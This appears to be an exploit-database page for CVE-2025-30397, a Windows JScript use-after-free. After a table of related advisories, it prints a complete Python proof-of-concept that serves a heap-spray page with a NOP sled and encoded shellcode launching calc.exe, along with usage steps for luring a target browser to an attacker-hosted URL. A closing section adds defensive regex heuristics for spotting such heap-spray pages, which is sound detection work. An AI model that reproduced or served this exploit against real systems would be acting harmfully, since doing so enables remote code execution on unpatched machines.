| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Type Confusion in Microsoft | 23 Jul 2025 15:34 | – | githubexploit |
| Exploit for CVE-2025-2783 | 26 May 2025 12:51 | – | githubexploit |
| Exploit for Type Confusion in Microsoft | 31 May 2025 12:20 | – | githubexploit |
| CVE-2025-30397 | 13 May 2025 00:00 | – | attackerkb |
| May Microsoft Patch Tuesday | 14 May 2025 00:58 | – | avleonov |
| CVE-2025-30397 | 13 May 2025 16:27 | – | circl |
| Microsoft Windows Scripting Engine Type Confusion Vulnerability | 13 May 2025 00:00 | – | cisa_kev |
| CISA Adds Five Known Exploited Vulnerabilities to Catalog | 13 May 2025 12:00 | – | cisa |
| Microsoft Scripting Engine Security Vulnerability | 13 May 2025 00:00 | – | cnnvd |
| CVE-2025-30397 | 13 May 2025 16:59 | – | cve |

#!/usr/bin/env python3
# Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)
# Exploit Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# CVE: CVE-2025-30397
# Vendor: Microsoft
# Affected Versions: Windows Server 2025 (build 25398 and prior)
# Tested on: Windows Server 2025 + IE11 (x86)
# Type: Remote
# Platform: Windows
# Vulnerability Type: Use-After-Free (JScript Engine)
# Description: This PoC exploits a Use-After-Free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution.
# ============================
# Usage Instructions:
#
# 1. Save this script as `exploit_server.py`.
# 2. Run it with Python 3:
# $ python3 exploit_server.py
# 3. On the vulnerable target (Windows Server 2025 + IE11):
# Open Internet Explorer and navigate to:
# http://<attacker-ip>:8080/poc_cve_2025_30397.html
#
# If the target is vulnerable, calc.exe will be executed.
# ============================
import http.server
import socketserver
PORT = 8080
HTML_CONTENT = b"""<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>PoC - CVE-2025-30397</title>
<script>
var payload = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
while (payload.length < 0x1000) payload += payload;
var shell = unescape(
"%u9090%u9090%uebfc%u5eeb%u31b8%u64c9%u8b8b%u3050%u8b0c%u8b70" +
"%u3c4a%u780c%u4f0a%u4b8b%u1c70%u8b1c%u8b6c%u0c5c%u8b14%u285c" +
"%uef01%u528b%u8b10%u3c0a%u758b%u1c28%u8b34%u5c6a%u0158%uc985" +
"%u75c9%u8b58%u8b10%u3c20%u418b%u0348%u408b%u8b34%u1c4a%uc085" +
"%u7401%u0343%u0c6a%u58eb%ue8d0%uff00%u6361%u6c63%u2e00%u6578" +
"%u0065"
);
var final = payload + shell;
var buffer = [];
for (var i = 0; i < 1500; i++) buffer[i] = final.substring(0);
var sprayTarget = document.createElement("iframe");
sprayTarget.setAttribute("src", "about:blank");
document.body.appendChild(sprayTarget);
for (var i = 0; i < 200; i++) {
try {
sprayTarget.contentWindow.eval("var a = '" + final + "'");
} catch (e) {}
}
for (var j = 0; j < 1000; j++) {
var obj = document.createElement("div");
obj.innerHTML = "EXPLOIT" + j;
document.body.appendChild(obj);
}
var victim = document.createElement("object");
victim.setAttribute("classid", "clsid:0002DF01-0000-0000-C000-000000000046");
document.body.appendChild(victim);
alert("PoC loaded. If vulnerable, calc.exe will launch.");
</script>
</head>
<body>
<h1 style="color:red;">Exploit PoC: CVE-2025-30397</h1>
<h2>Author: Mohammed Idrees Banyamer</h2>
<h3>Instagram: <a href="https://instagram.com/mbanyamer" target="_blank">@banyamer_security</a></h3>
<h3>GitHub: <a href="https://github.com/mbanyamer" target="_blank">mbanyamer</a></h3>
<p>This demonstration is for ethical testing only. Triggering the vulnerability on vulnerable Internet Explorer installations will lead to execution of calc.exe via shellcode.</p>
</body>
</html>
"""
class Handler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/' or self.path == '/poc_cve_2025_30397.html':
            self.send_response(200)
            self.send_header("Content-type", "text/html")
            self.send_header("Content-length", str(len(HTML_CONTENT)))
            self.send_header("X-Content-Type-Options", "nosniff")
            self.send_header("X-Frame-Options", "SAMEORIGIN")
            self.send_header("Content-Security-Policy", "default-src 'self'")
            self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
            self.send_header("Pragma", "no-cache")
            self.send_header("Expires", "0")
            self.end_headers()
            self.wfile.write(HTML_CONTENT)
        else:
            self.send_error(404, "File Not Found")


def run():
    print(f"Serving PoC on http://0.0.0.0:{PORT}/poc_cve_2025_30397.html")
    with socketserver.TCPServer(("", PORT), Handler) as httpd:
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            print("\nServer stopped.")


if __name__ == "__main__":
    run()
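
For defenders, the page structure in the listing above (a `%u9090` run passed to `unescape()`, a string-doubling loop, and a script-set `classid`) can be triaged in proxy or mail-gateway captures with a few heuristics. The following is an added example, not part of the original PoC or its author's code; `score_page`, `is_suspicious`, the threshold and both sample pages are constructed here and are assumptions, and the checks are generic heap-spray indicators rather than a signature for CVE-2025-30397.

```python
import re

# %uXXXX escapes pack raw 16-bit words into legacy JScript strings.
U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")
# Argument text of each unescape(...) call (string literals, possibly joined with "+").
UNESCAPE_CALL = re.compile(r"unescape\s*\(([^)]*)\)", re.S)
# "while (s.length < N) s += s" : a string doubled until it reaches spray-block size.
DOUBLING_LOOP = re.compile(
    r"while\s*\(\s*(\w+)\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)\s*\)\s*\1\s*\+=\s*\1"
)
# An element's classid assigned from script via setAttribute.
CLASSID_SET = re.compile(r"""setAttribute\(\s*["']classid["']""", re.I)


def score_page(html: str) -> dict:
    """Return the individual indicators and a 0-4 score for one HTML page."""
    words = []
    for call in UNESCAPE_CALL.finditer(html):
        words += [int(w, 16) for w in U_ESCAPE.findall(call.group(1))]
    findings = {
        "u_escaped_words": len(words),
        "nop_sled": sum(1 for w in words if w == 0x9090) >= 4,
        "doubling_loop": bool(DOUBLING_LOOP.search(html)),
        "script_set_classid": bool(CLASSID_SET.search(html)),
    }
    findings["score"] = (
        int(findings["nop_sled"]) + int(findings["doubling_loop"])
        + int(findings["script_set_classid"]) + int(len(words) >= 8)
    )
    return findings


def is_suspicious(html: str, threshold: int = 3) -> bool:
    # Threshold is an assumption; tune it against your own benign traffic.
    return score_page(html)["score"] >= threshold


# Constructed samples: no shellcode, only the structural markers.
SAMPLE_SUSPICIOUS = """<script>
var block = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
while (block.length < 0x1000) block += block;
var o = document.createElement("object");
o.setAttribute("classid", "clsid:00000000-0000-0000-0000-000000000000");
</script>"""
SAMPLE_BENIGN = """<script>
var q = unescape("%u00e9t%u00e9");
var title = document.title;
</script>"""
```
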